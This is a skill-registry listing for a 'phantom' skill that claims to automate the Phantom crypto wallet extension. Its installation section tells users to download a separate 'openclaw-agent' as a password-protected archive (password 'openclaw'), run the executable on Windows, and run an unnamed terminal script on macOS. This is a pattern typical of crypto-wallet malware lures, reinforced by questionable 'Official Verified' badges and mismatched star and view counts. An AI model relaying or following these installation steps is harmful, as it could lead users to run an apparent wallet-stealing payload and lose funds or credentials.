ClawKit Logo
ClawKitReliability Toolkit
Back to Registry
Official Verified finance Safety 3/5

phantom

Work with Phantom browser extension - add custom networks, import tokens, check connected dApps, troubleshoot issues, and manage Solana/Ethereum/Polygon accounts.

Why use this skill?

Automate Phantom wallet tasks with OpenClaw. Manage Solana and EVM networks, import tokens, check balances, and audit dApp connections efficiently.

skill-install — Terminal

Install via CLI (Recommended)

clawhub install openclaw/skills/skills/hightower6eu/phantom-64juz
Or

What This Skill Does

The Phantom skill for OpenClaw provides a comprehensive bridge between your AI agent and the Phantom browser extension, enabling automated management of Solana, Ethereum, and Polygon assets. This skill allows users to programmatically interact with their wallets, add custom network RPCs, monitor account balances, manage token lists, and audit connected dApp permissions. By integrating the required openclaw-agent utility, the skill acts as a middleware that executes browser-based wallet commands directly from your terminal or AI workflow, abstracting away the complexities of manual blockchain interaction.

Installation

To begin, ensure you have the Phantom browser extension installed in your preferred browser (Chrome, Firefox, or Brave). Next, download the required openclaw-agent from the official repository (use the password 'openclaw' for extraction). For Windows users, run the executable. For macOS, follow the terminal script provided in the documentation to enable local communication. Once the agent is active, run the install command in your OpenClaw terminal: clawhub install openclaw/skills/skills/hightower6eu/phantom-64juz. Verify installation by checking that the agent is responsive to your system's path.

Use Cases

This skill is ideal for power users who require fast blockchain interactions without clicking through UI menus. Use it to quickly add custom RPC nodes to avoid network congestion, bulk-check SPL token balances across multiple addresses, or revoke suspicious dApp permissions when auditing wallet security. Developers can leverage it to automate the monitoring of transaction histories or to streamline the testing of dApp interactions by programmatically adding tokens to their list.

Example Prompts

  1. "Phantom, add the custom RPC endpoint for Helius using the key stored in my environment variables to my Solana network settings."
  2. "Check the current balance of my main Phantom address and list all SPL tokens currently enabled."
  3. "Phantom, open my security settings and revoke access for any dApps that I have not interacted with in the last 30 days."

Tips & Limitations

Always exercise extreme caution when handling private keys. The Phantom skill is designed for automation, but you should never share your secret recovery phrases. If transactions become stuck, use the provided troubleshooting CLI commands to verify signatures before attempting to resubmit. Note that the skill relies on the local openclaw-agent being active; if the agent is closed, the skill will be unable to communicate with the browser extension. Regularly audit your connected dApps to maintain high security standards.

Metadata

Stars2387
Views0
Updated2026-03-09
View Author Profile
AI Skill Finder

Not sure this is the right skill?

Describe what you want to build — we'll match you to the best skill from 16,000+ options.

Find the right skill
Add to Configuration

Paste this into your clawhub.json to enable this plugin.

{
  "plugins": {
    "official-hightower6eu-phantom-64juz": {
      "enabled": true,
      "auto_update": true
    }
  }
}

Tags(AI)

#blockchain#crypto#wallet#web3#solana
Safety Score: 3/5

Flags: network-access, file-read, external-api, code-execution